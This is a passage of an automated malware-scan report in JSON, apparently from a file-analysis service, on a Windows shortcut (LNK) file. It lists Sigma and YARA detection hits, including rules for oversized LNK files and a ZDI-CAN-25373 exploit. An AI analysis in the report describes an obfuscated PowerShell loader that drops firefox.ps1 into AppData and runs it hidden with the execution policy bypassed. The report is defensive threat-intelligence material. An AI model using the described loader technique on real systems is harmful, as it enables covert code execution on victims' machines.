"rule_id": "c085cde9af85b182e783b8d7b42d66d3d0efe08696b4fe7946da3d5d1a2cd51e",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Potential PowerShell Obfuscation Using Alias Cmdlets",
"rule_description": "Detects Set-Alias or New-Alias cmdlet usage. Which can be use as a mean to obfuscate PowerShell scripts",
"rule_author": "frack113",
"match_context": [
{
"values": {
"ScriptBlockText": "Set-Alias -Name ncim -Value New-CimInstance -Option ReadOnly, AllScope -ErrorAction SilentlyContinue",
"Path": "",
"ScriptBlockId": "717c72ce-c73f-4b99-a48b-08cb625e0db7",
"MessageTotal": "1",
"MessageNumber": "1",
"EventID": "4104"
}
}
]
}
],
"magic": "MS Windows shortcut, Has Description string, Has command line arguments, Icon number=0, ctime=Thu Dec 31 23:59:59 1969, mtime=Thu Dec 31 23:59:59 1969, atime=Thu Dec 31 23:59:59 1969, length=0, window=hidenormalshowminimized",
"crowdsourced_yara_results": [
{
"ruleset_id": "002bb473a9",
"ruleset_version": "002bb473a9|d1fd450ec7c73f71e829d8f39a46e82e73687778",
"ruleset_name": "LNK_Ruleset",
"rule_name": "Large_filesize_LNK",
"match_date": 1775023545,
"description": "Identifies shortcut (LNK) file larger than 100KB. Most goodware LNK files are smaller than 100KB.",
"author": "@bartblaze",
"source": "https://github.com/bartblaze/Yara-rules"
},
{
"ruleset_id": "000a2489bd",
"ruleset_version": "000a2489bd|48401e01afaf50f369a7c99eab393389320c7380",
"ruleset_name": "expl_lnk_zdi_can_25373",
"rule_name": "EXT_EXPL_ZTH_LNK_EXPLOIT_A",
"match_date": 1775023545,
"description": "This YARA file detects padded LNK files designed to exploit ZDI-CAN-25373.",
"author": "Peter Girnus",
"source": "https://github.com/Neo23x0/signature-base"
},
{
"ruleset_id": "000bd045c7",
"ruleset_version": "000bd045c7|1d926845269a3ac8de0431da133950390b5cced3",
"ruleset_name": "gen_susp_lnk",
"rule_name": "SUSP_LNK_Big_Link_File",
"match_date": 1775023545,
"description": "Detects a suspiciously big LNK file - maybe with embedded content",
"author": "Florian Roth (Nextron Systems)",
"source": "https://github.com/Neo23x0/signature-base"
},
{
"ruleset_id": "002bb473a9",
"ruleset_version": "002bb473a9|d1fd450ec7c73f71e829d8f39a46e82e73687778",
"ruleset_name": "LNK_Ruleset",
"rule_name": "PS_in_LNK",
"match_date": 1775023545,
"description": "Identifies PowerShell artefacts in shortcut (LNK) files.",
"author": "@bartblaze",
"source": "https://github.com/bartblaze/Yara-rules"
}
],
"sigma_analysis_stats": {
"critical": 0,
"high": 1,
"medium": 5,
"low": 5
},
"crowdsourced_ai_results": [
{
"analysis": "The LNK file contains an exceptionally long, heavily obfuscated PowerShell script embedded within its arguments string. This script attempts to decode a large array of numbers using a custom routine and a hardcoded key, save the resulting payload to `$env:appdata\\firefox.ps1`, and then execute it silently using `powershell -windowstyle hidden -ExecutionPolicy Bypass`. Although the primary target appears to be a decoy Chrome executable path, the overriding factor is the direct inclusion of a complex, multi-stage, stealthy execution command using a LOLBin (PowerShell) for code execution and persistence/staging. This behavior is unequivocally malicious.",
"category": "code_insight",
"verdict": "malicious",
"source": "palm",
"id": "4b0358c7e4afa54bc489a6199cca132b5f4a330892eb15bf06c0c4da9e020df2-file-palm"
}
]
}
}
}